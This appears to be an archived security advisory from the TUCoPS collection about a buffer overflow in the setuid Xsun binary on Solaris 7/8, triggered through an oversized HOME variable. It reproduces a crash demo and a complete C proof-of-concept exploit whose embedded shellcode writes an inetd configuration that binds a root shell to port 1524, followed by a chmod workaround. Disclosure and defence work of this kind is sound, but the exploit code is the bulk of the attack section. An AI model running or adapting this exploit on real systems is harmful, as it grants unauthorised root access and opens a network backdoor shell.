TUCoPS :: SunOS/Solaris

TUCoPS :: SunOS/Solaris :: xsun2.htm
Solaris Xsun Buffer Overflow
Vulnerability

    Xsun

Affected

    Solaris 7/8 (x86 and sparc)

Description

    eEye Digital Security (Riley  Hassell) found following.   A buffer
    overflow  was  discovered  in  Xsun.  Since  Xsun  is  SUID  root,
    exploiting  this  vulnerability   yields  root  privileges.    The
    overflow  exists  in  Xsun's  handling  of  the  HOME  environment
    variable.

        bash-2.03$ HOME=`perl -e 'print "A"x1050'`
        bash-2.03$ /usr/openwin/bin/Xsun :1
        Warning: There is no XDISPLAY information for display 1.
        Server is using XDISPLAY information for display 0.
        Default Font Path: /usr/openwin/lib/X11/
        Segmentation Fault (core dumped)

    Proof of Concept:

    /***********************************/
    Solaris 7 (x86) /usr/openwin/bin/Xsun
    HOME environment overflow

    Proof of Concept Exploitation
    riley@eeye.com

    Puts a Root shell on local port 1524
    /***********************************/

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #define BUFLEN  1041

    /* seteuid/setuid/inetd shell */
    char eyecode[] =
    "\xeb\x51\x9a\x65\x65\x79\x65\x07\x90\xc3\x5e"
    "\x29\xc0\x89\x46\xab\x88\x46\xb0\x89\x46\x0c"
    "\x50\xb0\x8d\xe8\xe4\xff\xff\xff\x29\xc0\x50"
    "\xb0\x17\xe8\xda\xff\xff\xff\x29\xc0\x88\x46"
    "\x17\x88\x46\x1a\x88\x46\x78\x29\xc0\x50\x56"
    "\x8d\x5e\x10\x89\x1e\x53\x8d\x5e\x18\x89\x5e"
    "\x04\x8d\x5e\x1b\x89\x5e\x08\xb0\x3b\xe8\xb2"
    "\xff\xff\xff\x90\x90\xc3\xe8\xb2\xff\xff\xff"
    "\x90\x6b\x61\x6d\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x2f\x62\x69\x6e\x2f\x73"
    "\x68\x20\x2d\x63\x20"
    "echo \"ingreslock stream tcp nowait root /bin/sh sh -i\">/tmp/eeye;"
    "/usr/sbin/inetd -s /tmp/eeye2001";

    char buf[BUFLEN];
    unsigned long int nop, esp;
    long int offset = 0;

    unsigned long int get_esp()
    {__asm__("movl %esp,%eax");}

    int main (int argc, char *argv[])
    {
	    int i;
	    if (argc > 1)
		    offset = strtol(argv[1], NULL, 0);
	    else
		    offset = -200;
	    esp = get_esp();
	    memset(buf, 0x90, BUFLEN);
	    memcpy(buf+800, eyecode, strlen(eyecode));
	    *((int *) &buf[1037]) = esp+offset;
	    strncpy(&buf[0],"HOME=",5);
	    putenv(buf);
	    execl("/usr/openwin/bin/Xsun", "eEye", ":1",NULL);
	    return;
    }

    The correct information is:

        Solaris 7 and Solaris 8 x86 Xsun is suid
        Solaris 7 and Solaris 8 Sparc Xsun is sgid

Solution

    Sun Microsystems has been  contacted.  They are  currently working
    on patches  for this  and other  related vulnerabilities  eEye has
    discovered.

    Workaround:

        chmod -s /usr/openwin/bin/Xsun

    This will remove  the setuid bit  from Xsun, therefore  if someone
    does  exploit   this  vulnerability,   they  won't   gain   higher
    privileges.

    Xsun  is  set-uid  root  on  Solaris/Intel  where  it needs it for
    certain device  drivers.   Xsun is  set-gid sys  on Solaris/SPARC.
    If you run Xsun through dtlogin, you can safely strip the  set-uid
    bits.